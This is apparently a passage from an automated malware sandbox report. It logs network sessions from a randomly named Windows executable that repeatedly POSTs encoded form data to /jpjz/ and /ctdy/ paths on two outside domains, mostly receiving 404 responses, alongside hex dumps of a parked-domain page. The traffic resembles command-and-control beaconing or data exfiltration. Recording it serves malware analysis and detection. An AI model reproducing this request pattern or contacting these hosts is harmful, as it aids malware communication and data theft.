                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                    Jan 3, 2025 11:41:15.122052908 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                    Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                    Jan 3, 2025 11:41:15.122064114 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                    Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                    Jan 3, 2025 11:41:15.122075081 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                    Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                    Jan 3, 2025 11:41:15.122085094 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                    Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                    Jan 3, 2025 11:41:15.122096062 CET1120INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                    Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                                    Jan 3, 2025 11:41:15.122108936 CET892INData Raw: 6f 64 65 3d 6e 65 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b
                                                                    Data Ascii: ode=new function(){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 seq
                                                                    Jan 3, 2025 11:41:15.122118950 CET1236INData Raw: 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35
                                                                    Data Ascii: (c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeE
                                                                    Jan 3, 2025 11:41:15.122129917 CET884INData Raw: 2b 2b 64 29 68 3c 3d 28 43 3d 74 5b 64 5d 29 26 26 43 3c 6c 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63
                                                                    Data Ascii: ++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.450027134.122.133.80801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:20.609915972 CET755OUTPOST /jpjz/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.jrcov55qgcxp5fwa.top
                                                                    Origin: http://www.jrcov55qgcxp5fwa.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6e 69 76 66 44 2b 49 74 6b 2b 39 75 44 7a 34 77 6d 6e 6c 75 54 44 6b 32 33 57 6c 47 2f 7a 70 78 37 5a 72 6d 79 56 69 77 7a 55 4f 50 31 7a 31 51 4d 46 72 52 77 69 68 2f 6f 56 68 4b 4a 6f 65 57 78 4e 62 59 6a 34 58 64 66 53 57 67 4a 62 7a 58 59 6a 32 47 6a 70 32 71 69 54 75 64 6d 47 61 54 4e 66 57 52 39 67 61 65 4c 75 57 65 47 7a 64 72 43 5a 42 4a 4f 4e 62 6f 34 4c 41 6b 48 6d 58 50 6a 77 4c 4a 78 4c 53 64 48 35 36 31 76 71 5a 62 55 66 7a 64 74 68 34 69 73 73 6a 46 6c 59 4e 43 30 31 52 44 46 55 71 38 75 50 52 75 48 42 75 45 34 7a 37 44 66 51 3d 3d
                                                                    Data Ascii: 1V=Muqh5VPLPtCMnivfD+Itk+9uDz4wmnluTDk23WlG/zpx7ZrmyViwzUOP1z1QMFrRwih/oVhKJoeWxNbYj4XdfSWgJbzXYj2Gjp2qiTudmGaTNfWR9gaeLuWeGzdrCZBJONbo4LAkHmXPjwLJxLSdH561vqZbUfzdth4issjFlYNC01RDFUq8uPRuHBuE4z7DfQ==
                                                                    Jan 3, 2025 11:41:21.487103939 CET306INHTTP/1.1 404 Not Found
                                                                    Content-Length: 146
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:41:21 GMT
                                                                    Server: nginx
                                                                    X-Cache: BYPASS
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.450028134.122.133.80801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:23.169585943 CET775OUTPOST /jpjz/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.jrcov55qgcxp5fwa.top
                                                                    Origin: http://www.jrcov55qgcxp5fwa.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6d 42 6e 66 42 5a 6b 74 69 65 39 74 61 54 34 77 7a 58 6c 71 54 44 6f 32 33 58 68 57 2f 6d 35 78 36 38 58 6d 7a 51 4f 77 6d 55 4f 50 74 6a 31 52 52 31 72 4b 77 69 6b 4b 6f 51 5a 4b 4a 6f 4b 57 78 50 7a 59 6a 72 2f 53 65 43 57 69 46 37 7a 56 57 44 32 47 6a 70 32 71 69 54 37 56 6d 47 53 54 52 2b 6d 52 76 53 79 64 49 75 57 64 48 7a 64 72 55 70 42 4e 4f 4e 61 4c 34 4f 5a 35 48 6a 54 50 6a 31 6e 4a 79 61 53 65 65 4a 36 7a 72 71 59 50 54 2f 2b 47 73 55 30 6f 73 4d 6a 39 76 35 31 48 78 7a 63 5a 55 6c 4c 72 38 50 31 64 61 47 6e 77 31 77 47 4b 45 62 44 65 34 42 2f 55 58 52 73 41 32 4e 6f 6b 70 41 4c 50 42 6e 45 3d
                                                                    Data Ascii: 1V=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/m5x68XmzQOwmUOPtj1RR1rKwikKoQZKJoKWxPzYjr/SeCWiF7zVWD2Gjp2qiT7VmGSTR+mRvSydIuWdHzdrUpBNONaL4OZ5HjTPj1nJyaSeeJ6zrqYPT/+GsU0osMj9v51HxzcZUlLr8P1daGnw1wGKEbDe4B/UXRsA2NokpALPBnE=
                                                                    Jan 3, 2025 11:41:24.040982962 CET306INHTTP/1.1 404 Not Found
                                                                    Content-Length: 146
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:41:23 GMT
                                                                    Server: nginx
                                                                    X-Cache: BYPASS
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.450029134.122.133.80801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:25.737158060 CET10857OUTPOST /jpjz/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.jrcov55qgcxp5fwa.top
                                                                    Origin: http://www.jrcov55qgcxp5fwa.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6d 42 6e 66 42 5a 6b 74 69 65 39 74 61 54 34 77 7a 58 6c 71 54 44 6f 32 33 58 68 57 2f 6d 78 78 37 4f 76 6d 79 33 61 77 67 6b 4f 50 6c 44 31 4d 52 31 72 4c 77 69 63 52 6f 51 6c 30 4a 74 4f 57 77 75 54 59 30 4b 2f 53 51 43 57 69 4e 62 7a 57 59 6a 32 54 6a 70 6d 6d 69 54 72 56 6d 47 53 54 52 38 2b 52 74 41 61 64 4f 75 57 65 47 7a 64 6e 43 5a 42 70 4f 4e 7a 77 34 4f 55 4f 48 51 72 50 67 56 33 4a 30 6f 36 65 57 4a 36 78 6d 4b 59 48 54 2f 79 6a 73 55 42 58 73 50 2f 62 76 35 52 48 38 45 78 34 4a 68 4c 57 67 39 39 44 61 47 66 33 37 51 65 5a 63 72 54 32 75 52 4c 66 41 6a 59 57 35 63 67 68 33 52 4f 4d 66 67 4b 70 52 61 46 50 64 2b 6f 4b 58 53 41 2f 72 54 73 4c 49 6a 74 2b 71 2f 31 44 46 4a 54 69 6f 53 57 47 57 63 30 39 53 4b 4f 56 76 47 67 44 58 44 76 62 52 46 52 2b 35 70 57 35 48 49 47 4b 49 4d 2b 6e 45 71 43 46 67 4d 67 44 67 36 6b 4d 59 51 50 61 50 73 69 69 49 54 43 4e 4d 6c 55 71 4b 77 42 63 4e 7a 6a 6f 35 69 62 6c 2f 6f 2b 4a 47 34 30 64 50 66 4f 64 6e 52 38 [TRUNCATED]
                                                                    Data Ascii: 1V=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/mxx7Ovmy3awgkOPlD1MR1rLwicRoQl0JtOWwuTY0K/SQCWiNbzWYj2TjpmmiTrVmGSTR8+RtAadOuWeGzdnCZBpONzw4OUOHQrPgV3J0o6eWJ6xmKYHT/yjsUBXsP/bv5RH8Ex4JhLWg99DaGf37QeZcrT2uRLfAjYW5cgh3ROMfgKpRaFPd+oKXSA/rTsLIjt+q/1DFJTioSWGWc09SKOVvGgDXDvbRFR+5pW5HIGKIM+nEqCFgMgDg6kMYQPaPsiiITCNMlUqKwBcNzjo5ibl/o+JG40dPfOdnR8NCtf57+8IUtqRfPrkS3Ww91b9O8vadDEbwWGO+LOze3nxM79hS9e1Ceq22fplofMGSZUbhY25gw44umedgHQmW17wpNIWpPxD/BLA97MvXHUolSS7N6K1ebPhASjJ4r6iwbJO+GyPxEZF/kYHqVt7xEhSQcHeHa3S/A4ZIAlqAbBLKe7GpzQtfSAmY/HfkJeUq5mFWkrF+YGstPV8Q8zZu3uKr/trDW1J3Iy2WadOX+9dSx6uuONU+sd+XWcNQVKbI9fsVUvc9G+a8HeSTPvj/q7E10Z+pdkR5cuW58bBl2phzhx7bnHhbt+vmYBo1S7ULi62z8CGh4UxddSWAFmOBJGbfWE+wa5jc6PVhvgIL1dvzAaANpRydopOOb3mevDGvVzAQggQYBoKs3aJrW9Vboxu7tZEGRicoBeKOuyy+ZAHheZz+ALNgK1j2hdRqY9+IdSgTb5bueJvVwFX9SBUv0cvrs4S7xHS9hY5o4hmKus6WQCQ56VSreWuNAQq4Iif5UIFhJrPBg7OV9xvqzNZfO0GMB7kKb75Xb9YOo67n8qDRysvyOUncb73uLrWw6aMAEKf+6FHAe5SNxmTzXhmEEe5fTj643wqe3ceT3zP7wolKjhY8XXFmYsIR4sBNzzniC4Jw0wgh6sYAmVMQs73qtUrNk0nWx+sW [TRUNCATED]
                                                                    Jan 3, 2025 11:41:26.595901966 CET306INHTTP/1.1 404 Not Found
                                                                    Content-Length: 146
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:41:26 GMT
                                                                    Server: nginx
                                                                    X-Cache: BYPASS
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.450030134.122.133.80801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:28.286664963 CET475OUTGET /jpjz/?1V=BsCB6j6XIP/wuAbzMvYD7rFnMTUj3QEoDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcVAurUdDQdDmms6nVhCqDqAG2cNeT9xHcOvE=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.jrcov55qgcxp5fwa.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:41:29.157627106 CET306INHTTP/1.1 404 Not Found
                                                                    Content-Length: 146
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:41:28 GMT
                                                                    Server: nginx
                                                                    X-Cache: BYPASS
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.45003147.83.1.90801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:34.214912891 CET728OUTPOST /ctdy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.adadev.info
                                                                    Origin: http://www.adadev.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.adadev.info/ctdy/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 4c 30 76 4c 7a 51 4e 4d 74 49 65 4e 79 2b 6f 49 4b 58 5a 53 6d 48 63 2b 49 6a 57 39 4c 4f 7a 42 51 38 61 4c 55 31 38 49 48 71 78 67 51 4c 69 6b 54 6c 4b 31 43 32 31 45 74 46 71 63 6f 67 6f 67 51 51 57 43 47 69 51 37 50 52 30 53 31 32 6f 7a 36 30 2f 74 39 4a 39 32 48 2b 65 48 45 46 68 30 6e 49 45 6a 36 4f 4c 70 4e 64 2f 30 43 66 48 31 50 6a 43 36 66 44 41 4b 4f 42 5a 35 78 4d 6a 62 33 74 44 31 37 56 57 5a 77 75 71 30 34 45 52 55 48 70 78 2b 4a 39 59 39 6f 64 6a 47 6b 56 30 56 57 39 56 39 69 70 51 32 7a 50 66 67 55 79 53 47 58 5a 49 79 2b 67 3d 3d
                                                                    Data Ascii: 1V=0anqji6gQT7yL0vLzQNMtIeNy+oIKXZSmHc+IjW9LOzBQ8aLU18IHqxgQLikTlK1C21EtFqcogogQQWCGiQ7PR0S12oz60/t9J92H+eHEFh0nIEj6OLpNd/0CfH1PjC6fDAKOBZ5xMjb3tD17VWZwuq04ERUHpx+J9Y9odjGkV0VW9V9ipQ2zPfgUySGXZIy+g==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.45003247.83.1.90801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:36.765196085 CET748OUTPOST /ctdy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.adadev.info
                                                                    Origin: http://www.adadev.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.adadev.info/ctdy/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 5a 46 66 4c 2f 58 5a 4d 76 6f 65 4d 73 75 6f 49 54 48 5a 65 6d 48 51 2b 49 6d 32 54 4c 38 58 42 54 64 71 4c 56 30 38 49 45 71 78 67 59 72 69 6c 4e 56 4b 36 43 78 38 6e 74 45 57 63 6f 67 73 67 51 52 6d 43 47 54 51 38 4f 42 30 51 38 57 6f 78 6e 6b 2f 74 39 4a 39 32 48 2b 4c 69 45 46 70 30 6d 37 73 6a 36 76 4c 75 4f 64 2f 7a 53 50 48 31 59 7a 43 45 66 44 41 34 4f 45 6b 69 78 4f 72 62 33 73 7a 31 36 45 57 65 36 75 71 32 6c 30 51 49 58 4a 51 72 49 5a 42 68 33 65 37 63 6b 30 34 56 65 62 59 6e 7a 59 78 68 68 50 37 54 4a 31 62 79 61 61 31 37 6c 6e 34 6a 35 53 2f 61 78 70 75 35 36 4a 48 75 54 53 37 53 55 2f 4d 3d
                                                                    Data Ascii: 1V=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8XBTdqLV08IEqxgYrilNVK6Cx8ntEWcogsgQRmCGTQ8OB0Q8Woxnk/t9J92H+LiEFp0m7sj6vLuOd/zSPH1YzCEfDA4OEkixOrb3sz16EWe6uq2l0QIXJQrIZBh3e7ck04VebYnzYxhhP7TJ1byaa17ln4j5S/axpu56JHuTS7SU/M=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.45003347.83.1.90801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:39.317044020 CET10830OUTPOST /ctdy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.adadev.info
                                                                    Origin: http://www.adadev.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.adadev.info/ctdy/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 5a 46 66 4c 2f 58 5a 4d 76 6f 65 4d 73 75 6f 49 54 48 5a 65 6d 48 51 2b 49 6d 32 54 4c 38 66 42 54 75 79 4c 55 58 6b 49 46 71 78 67 62 72 69 6f 4e 56 4b 6a 43 33 55 37 74 45 61 6d 6f 6a 59 67 66 54 65 43 41 6e 38 38 48 42 30 51 2b 57 6f 77 36 30 2f 34 39 4a 74 36 48 2b 62 69 45 46 70 30 6d 2b 6f 6a 38 2b 4c 75 49 64 2f 30 43 66 48 51 50 6a 43 2f 66 44 6f 6f 4f 46 30 79 79 2f 4c 62 32 4d 6a 31 35 32 75 65 79 75 71 77 31 6b 51 41 58 4a 64 37 49 59 70 74 33 64 6e 69 6b 30 38 56 63 39 42 75 70 4c 38 2b 67 66 37 55 5a 6c 76 4e 55 4b 4e 68 73 67 77 36 31 43 50 64 6f 4c 32 57 2f 2b 76 6c 42 54 75 56 49 71 74 57 6d 59 79 73 38 6d 68 52 46 39 4f 5a 2b 4d 2f 51 38 59 51 6c 32 50 31 6e 73 46 57 78 55 6d 4b 31 35 32 75 4c 66 67 56 56 38 50 42 34 76 66 50 68 41 72 67 47 31 66 5a 6b 6b 38 6e 65 37 76 4d 6a 58 33 68 77 32 63 6d 58 6b 49 4e 54 48 61 39 4c 34 75 43 4b 72 56 72 4f 33 45 45 54 2b 46 61 6d 2f 46 58 46 66 52 79 6a 36 77 45 41 70 79 44 6f 67 31 58 64 30 33 57 [TRUNCATED]
